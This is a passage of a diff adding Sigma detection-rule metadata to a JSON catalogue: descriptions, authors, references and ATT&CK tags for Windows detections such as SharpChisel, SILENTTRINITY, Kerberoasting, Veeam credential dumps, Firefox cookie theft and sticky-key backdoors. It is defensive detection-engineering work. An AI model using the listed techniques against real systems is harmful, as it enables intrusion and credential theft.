+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1090.001"
+ ]
+ },
+ "uuid": "cf93e05e-d798-4d9e-b522-b0248dc61eaf",
+ "value": "SharpChisel Usage"
+ },
+ {
+ "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. 
log4j exploitation)", + "meta": { + "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", + "creation_date": "2021/12/17", + "falsepositive": [ + "Legitimate calls to system binaries", + "Company specific internal usage" + ], + "filename": "proc_creation_win_shell_spawn_by_java.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shell_spawn_by_java.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", + "value": "Shells Spawned by Java" + }, + { + "description": "Detects a suspicious child process of a Windows shell", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2018/04/06", + "falsepositive": [ + "Administrative scripts", + "Microsoft SCCM" + ], + "filename": "proc_creation_win_shell_spawn_susp_program.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shell_spawn_susp_program.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1059.005", + "attack.t1059.001", + "attack.t1218" + ] + }, + "uuid": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", + "value": "Windows Shell Spawning Suspicious Program" + }, + { + "description": "Detects SILENTTRINITY stager use", + "meta": { + "author": "Aleksey Potapov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_silenttrinity_stage_use.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/byt3bl33d3r/SILENTTRINITY", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_silenttrinity_stage_use.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071" + ] + }, + "uuid": "03552375-cc2c-4883-bbe4-7958d5a980be", + "value": "SILENTTRINITY Stager Execution" + }, + { + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/16", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_win_software_discovery.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", + "https://github.com/harleyQu1nn/AggressorScripts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518" + ] + }, + "uuid": "e13f668e-7f95-443d-98d2-1816a7648a7b", + "value": "Detected Windows Software Discovery" + }, + { + "description": "Detect attacker collecting audio via SoundRecorder application.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate audio capture by legitimate user." 
+ ], + "filename": "proc_creation_win_soundrec_audio_capture.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", + "https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_soundrec_audio_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ] + }, + "uuid": "83865853-59aa-449e-9600-74b9d89a6d6e", + "value": "Audio Capture via SoundRecorder" + }, + { + "description": "Detects Service Principal Name Enumeration used for Kerberoasting", + "meta": { + "author": "Markus Neis, keepwatch", + "creation_date": "2018/11/14", + "falsepositive": [ + "Administrator Activity" + ], + "filename": "proc_creation_win_spn_enum.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_spn_enum.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", + "value": "Possible SPN Enumeration" + }, + { + "description": "Detects dump of credentials in VeeamBackup dbo", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sqlcmd_veeam_dump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005" + ] + }, + "uuid": "b57ba453-b384-4ab9-9f40-1038086b4e53", + "value": "VeeamBackup Database Credentials Dump" + }, + { + "description": "Detect use of sqlite binary to query the Firefox cookies.sqlite database and steal the cookie data contained within it", + "meta": { + "author": "frack113", + "creation_date": "2022/04/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sqlite_firefox_cookies.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_firefox_cookies.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1539" + ] + }, + "uuid": "4833155a-4053-4c9c-a997-777fcea0baa7", + "value": "SQLite Firefox Cookie DB Access" + }, + { + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "meta": { + "author": "Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2018/03/15", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_stickykey_like_backdoor.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stickykey_like_backdoor.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + 
"attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" + ] + }, + "uuid": "2fdefcb3-dbda-401e-ae23-f0db027628bc", + "value": "Sticky Key Like Backdoor Usage" + }, + { + "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", + "meta": { + "author": "Sreeman", + "creation_date": "2020/02/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html", + "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml" + ], + "tags": [ + "attack.t1546.008", + "attack.privilege_escalation" + ] + }, + "uuid": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", + "value": "Sticky-Key Backdoor Copy Cmd.exe" + }, + { + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "meta": { + "author": "Austin Songer (@austinsonger)", + "creation_date": "2021/10/21", + "falsepositive": [ + "Legitimate usage of stordiag.exe." 
+ ], + "filename": "proc_creation_win_stordiag_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html", + "https://twitter.com/eral4m/status/1451112385041911809", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stordiag_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "value": "Execution via stordiag.exe" + }, + { + "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", + "meta": { + "author": "frack113", + "creation_date": "2022/07/16", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_susp_16bit_application.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", + "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", + "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", + "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "16905e21-66ee-42fe-b256-1318ada2d770", + "value": "Start of NT Virtual DOS Machine" + }, + { + "description": "Detects the use of 3proxy, a tiny free proxy server", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/13", + "falsepositive": [ + "Administrative 
activity" + ], + "filename": "proc_creation_win_susp_3proxy_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/3proxy/3proxy", + "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ] + }, + "uuid": "f38a82d2-fba3-4781-b549-525efbec8506", + "value": "3Proxy Usage" + }, + { + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "meta": { + "author": "frack113", + "creation_date": "2021/07/27", + "falsepositive": [ + "Command line parameter combinations that contain all included strings" + ], + "filename": "proc_creation_win_susp_7z.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_7z.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "9fbf5927-5261-4284-a71d-f681029ea574", + "value": "Compress Data and Lock With Password for Exfiltration With 7-ZIP" + }, + { + "description": "Detects a suspicious 7zip execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/27", + "falsepositive": [ + "Legitimate use of 7-Zip with a command line in which .dmp appears accidentally" + ], + "filename": "proc_creation_win_susp_7zip_dmp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_7zip_dmp.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", + "value": "7Zip Compressing Dump Files" + }, + { + "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_add_local_admin.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", + "value": "Add User to Local Administrators" + }, + { + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/06", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_add_user_remote_desktop.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml" + ], + "tags": [ + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" + ] 
+ }, + "uuid": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", + "value": "Suspicious Add User to Remote Desktop Users Group" + }, + { + "description": "Detects the execution of a AdFind for enumeration based on it's commadline flags", + "meta": { + "author": "frack113", + "creation_date": "2021/12/13", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_adfind_enumeration.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.joeware.net/freetools/tools/adfind/", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ] + }, + "uuid": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "value": "Suspicious AdFind Enumeration" + }, + { + "description": "AdFind continues to be seen across majority of breaches. 
It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "meta": { + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "creation_date": "2021/02/02", + "falsepositive": [ + "Legitimate admin activity" + ], + "filename": "proc_creation_win_susp_adfind_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.joeware.net/freetools/tools/adfind/", + "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_usage.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" + ] + }, + "uuid": "9a132afa-654e-11eb-ae93-0242ac130002", + "value": "AdFind Usage Detection" + }, + { + "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_adidnsdump.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adidnsdump.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", + "value": "Suspicious Execution of Adidnsdump" + }, + { + "description": "Detects the execution of AdvancedRun utility", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_advancedrun.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/splinter_code/status/1483815103279603714", + "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", + "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml" + ], + "tags": "No established tags" + }, + "uuid": "d2b749ee-4225-417e-b20e-a8d2193cbb84", + "value": "Suspicious AdvancedRun Execution" + }, + { + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_advancedrun_priv_user.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/splinter_code/status/1483815103279603714", + 
"https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", + "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml" + ], + "tags": "No established tags" + }, + "uuid": "fa00b701-44c6-4679-994d-5a18afa8a707", + "value": "Suspicious AdvancedRun Runas Priv User" + }, + { + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "meta": { + "author": "frack113", + "creation_date": "2021/07/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_athremotefxvgpudisablementcommand.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_athremotefxvgpudisablementcommand.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", + "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand" + }, + { + "description": "Detects base64 encoded powershell 'Invoke-' call", + "meta": { + "author": "pH-T", + "creation_date": "2022/05/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_base64_invoke.yml", + "level": "high", + "logsource.category": "process_creation", + 
"logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_invoke.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "value": "Suspicious Base64 Encoded Powershell Invoke" + }, + { + "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", + "meta": { + "author": "pH-T", + "creation_date": "2022/03/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_base64_load.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "9c0295ce-d60d-40bd-bd74-84673b7592b1", + "value": "Suspicious Encoded Obfuscated LOAD String" + }, + { + "description": "Detects, possibly, malicious unauthorized usage of bcdedit.exe", + "meta": { + "author": "@neu5ron", + "creation_date": "2019/02/07", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_susp_bcdedit.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set", + "https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bcdedit.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.persistence", + "attack.t1542.003" + ] + }, + "uuid": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "value": "Possible Ransomware or Unauthorized MBR Modifications" + }, + { + "description": "Execute VBscript code that is referenced within the *.bgi file.", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2019/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_bginfo.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", + "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bginfo.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ] + }, + "uuid": "aaf46cdc-934e-4284-b329-34aa701e3771", + "value": "Application Whitelisting Bypass via Bginfo" + }, + { + "description": "Detects transferring files from system on a server bitstransfer Powershell cmdlets", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_bitstransfer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bitstransfer.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.persistence", + "attack.t1197" + ] + }, + "uuid": 
"cd5c8085-4070-4e22-908d-a5b3342deb74", + "value": "Suspicious Bitstransfer via PowerShell" + }, + { + "description": "Detects execution of a set of builtin commands often used in recon stages by different attack groups", + "meta": { + "author": "Florian Roth, Markus Neis", + "creation_date": "2018/08/22", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_builtin_commands_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/haroonmeer/status/939099379834658817", + "https://twitter.com/c_APT_ure/status/939475433711722497", + "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" + ] + }, + "uuid": "2887e914-ce96-435f-8105-593937e90757", + "value": "Reconnaissance Activity Using BuiltIn Commands" + }, + { + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_calc.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/ItsReallyNick/status/1094080242686312448", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_calc.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "737e618a-a410-49b5-bec3-9e55ff7fbc15", + "value": "Suspicious Calculator Usage" + }, + { + "description": "Launch 64-bit shellcode 
from a debugger script file using cdb.exe.", + "meta": { + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", + "creation_date": "2019/10/26", + "falsepositive": [ + "Legitimate use of debugging tools" + ], + "filename": "proc_creation_win_susp_cdb.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/", + "http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html", + "https://twitter.com/nas_bench/status/1534957360032120833", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cdb.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1218", + "attack.t1127" + ] + }, + "uuid": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", + "value": "Possible App Whitelisting Bypass via WinDbg/CDB as a Shellcode Runner" + }, + { + "description": "Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code", + "meta": { + "author": "Florian Roth, juju4, keepwatch", + "creation_date": "2019/01/16", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_certutil_command.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/JohnLaTwC/status/835149808817991680", + "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/", + "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/", + "https://twitter.com/egre55/status/1087685529016193025", + "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml" + ], + "tags": [ 
+ "attack.defense_evasion", + "attack.t1140", + "attack.command_and_control", + "attack.t1105", + "attack.s0160", + "attack.g0007", + "attack.g0010", + "attack.g0045", + "attack.g0049", + "attack.g0075", + "attack.g0096" + ] + }, + "uuid": "e011a729-98a6-4139-b5c4-bf6f6dd8239a", + "value": "Suspicious Certutil Command Usage" + }, + { + "description": "Detects suspicious a certutil command that used to encode files, which is sometimes used for data exfiltration", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/02/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_certutil_encode.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", + "value": "Certutil Encode" + }, + { + "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_char_in_cmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", + 
